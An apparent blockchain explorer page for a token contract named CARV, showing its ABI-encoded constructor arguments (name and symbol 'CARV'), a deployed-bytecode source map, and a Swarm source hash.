Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000004434152560000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044341525600000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): CARV
Arg [1] : symbol_ (string): CARV

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [3] : 4341525600000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [5] : 4341525600000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

4083:10557:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6814:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8561:152;;;;;;:::i;:::-;;:::i;:::-;;;1085:14:1;;1078:22;1060:41;;1048:2;1033:18;8561:152:0;920:187:1;5940:91:0;6011:12;;5940:91;;;1258:25:1;;;1246:2;1231:18;5940:91:0;1112:177:1;9298:287:0;;;;;;:::i;:::-;;:::i;6039:83::-;;;6113:1;1815:36:1;;1803:2;1788:18;6039:83:0;1673:184:1;7416:169:0;;;;;;:::i;:::-;;:::i;:::-;;4346:25;;;;;;:::i;:::-;;:::i;:::-;;;-1:-1:-1;;;;;2609:32:1;;;2591:51;;2579:2;2564:18;4346:25:0;2445:203:1;6582:109:0;;;;;;:::i;:::-;-1:-1:-1;;;;;6666:17:0;6639:7;6666:17;;;:8;:17;;;;;;;6582:109;1722:103;;;:::i;6319:100::-;;;:::i;:::-;;;;;;;:::i;994:87::-;1040:7;1067:6;-1:-1:-1;;;;;1067:6:0;994:87;;5197:93;;;:::i;14239:398::-;;;;;;:::i;:::-;;:::i;7800:144::-;;;;;;:::i;:::-;;:::i;12949:571::-;;;;;;:::i;:::-;;:::i;7955:134::-;;;;;;:::i;:::-;;:::i;6426:148::-;;;;;;:::i;:::-;;:::i;6814:88::-;6851:13;6884:10;6877:17;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6814:88;:::o;8561:152::-;8627:4;8644:39;832:10;8667:7;8676:6;8644:8;:39::i;:::-;-1:-1:-1;8701:4:0;8561:152;;;;;:::o;9298:287::-;9421:4;832:10;9479:38;9495:4;832:10;9510:6;9479:15;:38::i;:::-;9528:27;9538:4;9544:2;9548:6;9528:9;:27::i;:::-;-1:-1:-1;9573:4:0;;9298:287;-1:-1:-1;;;;9298:287:0:o;7416:169::-;7483:2;;-1:-1:-1;;;;;7483:2:0;832:10;7483:18;7480:61;;7517:12;;-1:-1:-1;;;7517:12:0;;;;;;;:::i;:::-;;;;;;;;7480:61;-1:-1:-1;;;;;7554:7:0;;;;;;;;:1;:7;;;;;:23;;-1:-1:-1;;7554:23:0;;;;;;;;;;7416:169::o;4346:25::-;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;4346:25:0;;-1:-1:-1;4346:25:0;:::o;1722:103::-;713:13;:11;:13::i;:::-;1787:30:::1;1814:1;1787:18;:30::i;:::-;1722:103::o:0;6319:100::-;6367:16;6403:8;6396:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;6396:15:0;;;;;;;;;;;;;;;;;;;;;;6319:100;:::o;5197:93::-;5237:13;5270:12;5263:19;;;;;:::i;14239:398::-;14332:4;832:10;14332:4;14415:25;832:10;14432:7;14415:9;:25::i;:::-;14388:52;;14479:15;14459:16;:35;;14451:85;;;;-1:-1:-1;;;14451:85:0;;4668:2:1;14451:85:0;;;4650:21:1;4707:2;4687:18;;;4680:30;4746:34;4726:18;;;4719:62;-1:-1:-1;;;4797:18:1;;;4790:35;4842:19;;14451:85:0;4466:401:1;14451:85:0;14547:60;14556:5;14563:7;14572:34;14591:15;14572:16;:34;:::i;:::-;14547:8;:60::i;7800:144::-;7862:4;7879:35;832:10;7903:2;7907:6;7879:9;:35::i;12949:571::-;13119:5;;13086:6;;13070:13;;13119:11;;13086:6;;13119:11;:::i;:::-;13196:12;;13255:2;;13103:27;;-1:-1:-1;832:10:0;;;;-1:-1:-1;;;;;13255:2:0;:18;;13252:257;;13289:12;;-1:-1:-1;;;13289:12:0;;;;;;;:::i;13252:257::-;13335:2;;-1:-1:-1;;;;;13335:2:0;832:10;13335:18;13332:69;;13373:12;;-1:-1:-1;;;13373:12:0;;;;;;;:::i;13332:69::-;-1:-1:-1;;;;;13411:15:0;;;;;;:8;:15;;;;;:24;;13430:5;;13411:15;:24;;13430:5;;13411:24;:::i;:::-;;;;-1:-1:-1;13447:14:0;;-1:-1:-1;13456:5:0;13447:14;;:::i;:::-;13473:12;:20;-1:-1:-1;;;;;;12949:571:0:o;7955:134::-;-1:-1:-1;;;;;8054:18:0;;;8027:7;8054:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;7955:134::o;6426:148::-;6491:2;;-1:-1:-1;;;;;6491:2:0;6497:10;6491:16;6487:53;;6520:12;;-1:-1:-1;;;6520:12:0;;;;;;;:::i;6487:53::-;-1:-1:-1;;;;;6550:7:0;;;;;;;;:1;:7;;;;;:20;;-1:-1:-1;;6550:20:0;;;;;;;;;;6426:148::o;11104:378::-;-1:-1:-1;;;;;11240:19:0;;11232:68;;;;-1:-1:-1;;;11232:68:0;;5642:2:1;11232:68:0;;;5624:21:1;5681:2;5661:18;;;5654:30;5720:34;5700:18;;;5693:62;-1:-1:-1;;;5771:18:1;;;5764:34;5815:19;;11232:68:0;5440:400:1;11232:68:0;-1:-1:-1;;;;;11319:21:0;;11311:68;;;;-1:-1:-1;;;11311:68:0;;6047:2:1;11311:68:0;;;6029:21:1;6086:2;6066:18;;;6059:30;6125:34;6105:18;;;6098:62;-1:-1:-1;;;6176:18:1;;;6169:32;6218:19;;11311:68:0;5845:398:1;11311:68:0;-1:-1:-1;;;;;11390:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;11442:32;;1258:25:1;;;11442:32:0;;1231:18:1;11442:32:0;;;;;;;11104:378;;;:::o;11774:409::-;11909:24;11936:25;11946:5;11953:7;11936:9;:25::i;:::-;11909:52;;-1:-1:-1;;11976:16:0;:37;11972:204;;12058:6;12038:16;:26;;12030:68;;;;-1:-1:-1;;;12030:68:0;;6450:2:1;12030:68:0;;;6432:21:1;6489:2;6469:18;;;6462:30;6528:31;6508:18;;;6501:59;6577:18;;12030:68:0;6248:353:1;12030:68:0;12113:51;12122:5;12129:7;12138:25;12157:6;12138:16;:25;:::i;12113:51::-;11898:285;11774:409;;;:::o;10005:668::-;-1:-1:-1;;;;;10139:14:0;;;10116:21;10139:14;;;:8;:14;;;;;;;;;10178:5;;;;;:1;:5;;;;;;;;:18;;;;-1:-1:-1;10194:2:0;;-1:-1:-1;;;;;10187:9:0;;;10194:2;;10187:9;;10178:18;10177:40;;10204:13;10177:40;;;10200:1;10177:40;10161:56;-1:-1:-1;;;;;;10233:18:0;;10225:68;;;;-1:-1:-1;;;10225:68:0;;6808:2:1;10225:68:0;;;6790:21:1;6847:2;6827:18;;;6820:30;6886:34;6866:18;;;6859:62;-1:-1:-1;;;6937:18:1;;;6930:35;6982:19;;10225:68:0;6606:401:1;10225:68:0;-1:-1:-1;;;;;10309:16:0;;10301:64;;;;-1:-1:-1;;;10301:64:0;;7214:2:1;10301:64:0;;;7196:21:1;7253:2;7233:18;;;7226:30;7292:34;7272:18;;;7265:62;-1:-1:-1;;;7343:18:1;;;7336:33;7386:19;;10301:64:0;7012:399:1;10301:64:0;-1:-1:-1;;;;;10389:7:0;;;;;;:1;:7;;;;;;;;:27;;10403:13;10389:27;;;10399:1;10389:27;10373:43;;10449:6;10432:13;:23;;10424:74;;;;-1:-1:-1;;;10424:74:0;;7618:2:1;10424:74:0;;;7600:21:1;7657:2;7637:18;;;7630:30;7696:34;7676:18;;;7669:62;-1:-1:-1;;;7747:18:1;;;7740:36;7793:19;;10424:74:0;7416:402:1;10424:74:0;-1:-1:-1;;;;;10523:14:0;;;;;;:8;:14;;;;;;:21;;10538:6;;10523:21;:::i;:::-;-1:-1:-1;;;;;10506:14:0;;;;;;;:8;:14;;;;;;:38;;;;10567:12;;;;;;;:19;;10580:6;;10567:19;:::i;:::-;-1:-1:-1;;;;;10552:12:0;;;;;;;:8;:12;;;;;;;:34;;;;10605:26;;;;;;;;;;10624:6;1258:25:1;;1246:2;1231:18;;1112:177;10605:26:0;;;;;;;;10640:19;10656:2;10640:15;:19::i;1434:132::-;1040:7;1067:6;-1:-1:-1;;;;;1067:6:0;832:10;1498:23;1490:68;;;;-1:-1:-1;;;1490:68:0;;8025:2:1;1490:68:0;;;8007:21:1;;;8044:18;;;8037:30;8103:34;8083:18;;;8076:62;8155:18;;1490:68:0;7823:356:1;1987:191:0;2061:16;2080:6;;-1:-1:-1;;;;;2097:17:0;;;-1:-1:-1;;;;;;2097:17:0;;;;;;2130:40;;2080:6;;;;;;;2130:40;;2061:16;2130:40;2050:128;1987:191;:::o;6128:183::-;-1:-1:-1;;;;;6196:17:0;;;;;;:7;:17;;;;;;;;6191:113;;-1:-1:-1;;;;;6230:17:0;;;;;;:7;:17;;;;;:24;;-1:-1:-1;;6230:24:0;6250:4;6230:24;;;;;;6269:8;:23;;;;;;;;;;;;;;-1:-1:-1;;;;;;6269:23:0;;;;;;6191:113;6128:183;:::o;14:418:1:-;163:2;152:9;145:21;126:4;195:6;189:13;238:6;233:2;222:9;218:18;211:34;297:6;292:2;284:6;280:15;275:2;264:9;260:18;254:50;353:1;348:2;339:6;328:9;324:22;320:31;313:42;423:2;416;412:7;407:2;399:6;395:15;391:29;380:9;376:45;372:54;364:62;;;14:418;;;;:::o;437:173::-;505:20;;-1:-1:-1;;;;;554:31:1;;544:42;;534:70;;600:1;597;590:12;534:70;437:173;;;:::o;615:300::-;683:6;691;744:2;732:9;723:7;719:23;715:32;712:52;;;760:1;757;750:12;712:52;783:29;802:9;783:29;:::i;:::-;773:39;881:2;866:18;;;;853:32;;-1:-1:-1;;;615:300:1:o;1294:374::-;1371:6;1379;1387;1440:2;1428:9;1419:7;1415:23;1411:32;1408:52;;;1456:1;1453;1446:12;1408:52;1479:29;1498:9;1479:29;:::i;:::-;1469:39;;1527:38;1561:2;1550:9;1546:18;1527:38;:::i;:::-;1294:374;;1517:48;;-1:-1:-1;;;1634:2:1;1619:18;;;;1606:32;;1294:374::o;1862:347::-;1927:6;1935;1988:2;1976:9;1967:7;1963:23;1959:32;1956:52;;;2004:1;2001;1994:12;1956:52;2027:29;2046:9;2027:29;:::i;:::-;2017:39;;2106:2;2095:9;2091:18;2078:32;2153:5;2146:13;2139:21;2132:5;2129:32;2119:60;;2175:1;2172;2165:12;2119:60;2198:5;2188:15;;;1862:347;;;;;:::o;2214:226::-;2273:6;2326:2;2314:9;2305:7;2301:23;2297:32;2294:52;;;2342:1;2339;2332:12;2294:52;-1:-1:-1;2387:23:1;;2214:226;-1:-1:-1;2214:226:1:o;2653:186::-;2712:6;2765:2;2753:9;2744:7;2740:23;2736:32;2733:52;;;2781:1;2778;2771:12;2733:52;2804:29;2823:9;2804:29;:::i;:::-;2794:39;2653:186;-1:-1:-1;;;2653:186:1:o;2844:637::-;3034:2;3046:21;;;3116:13;;3019:18;;;3138:22;;;2986:4;;3217:15;;;3191:2;3176:18;;;2986:4;3260:195;3274:6;3271:1;3268:13;3260:195;;;3339:13;;-1:-1:-1;;;;;3335:39:1;3323:52;;3404:2;3430:15;;;;3395:12;;;;3371:1;3289:9;3260:195;;;-1:-1:-1;3472:3:1;;2844:637;-1:-1:-1;;;;;2844:637:1:o;3486:260::-;3554:6;3562;3615:2;3603:9;3594:7;3590:23;3586:32;3583:52;;;3631:1;3628;3621:12;3583:52;3654:29;3673:9;3654:29;:::i;:::-;3644:39;;3702:38;3736:2;3725:9;3721:18;3702:38;:::i;:::-;3692:48;;3486:260;;;;;:::o;3751:380::-;3830:1;3826:12;;;;3873;;;3894:61;;3948:4;3940:6;3936:17;3926:27;;3894:61;4001:2;3993:6;3990:14;3970:18;3967:38;3964:161;;4047:10;4042:3;4038:20;4035:1;4028:31;4082:4;4079:1;4072:15;4110:4;4107:1;4100:15;3964:161;;3751:380;;;:::o;4136:325::-;4338:2;4320:21;;;4377:1;4357:18;;;4350:29;-1:-1:-1;;;4410:2:1;4395:18;;4388:32;4452:2;4437:18;;4136:325::o;4872:127::-;4933:10;4928:3;4924:20;4921:1;4914:31;4964:4;4961:1;4954:15;4988:4;4985:1;4978:15;5004:128;5071:9;;;5092:11;;;5089:37;;;5106:18;;:::i;5137:168::-;5210:9;;;5241;;5258:15;;;5252:22;;5238:37;5228:71;;5279:18;;:::i;5310:125::-;5375:9;;;5396:10;;;5393:36;;;5409:18;;:::i

Swarm Source

ipfs://65954af51ba298ff91d4e2a48a5ec2c92dd99507cc811f944973f020b40e9a0d
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.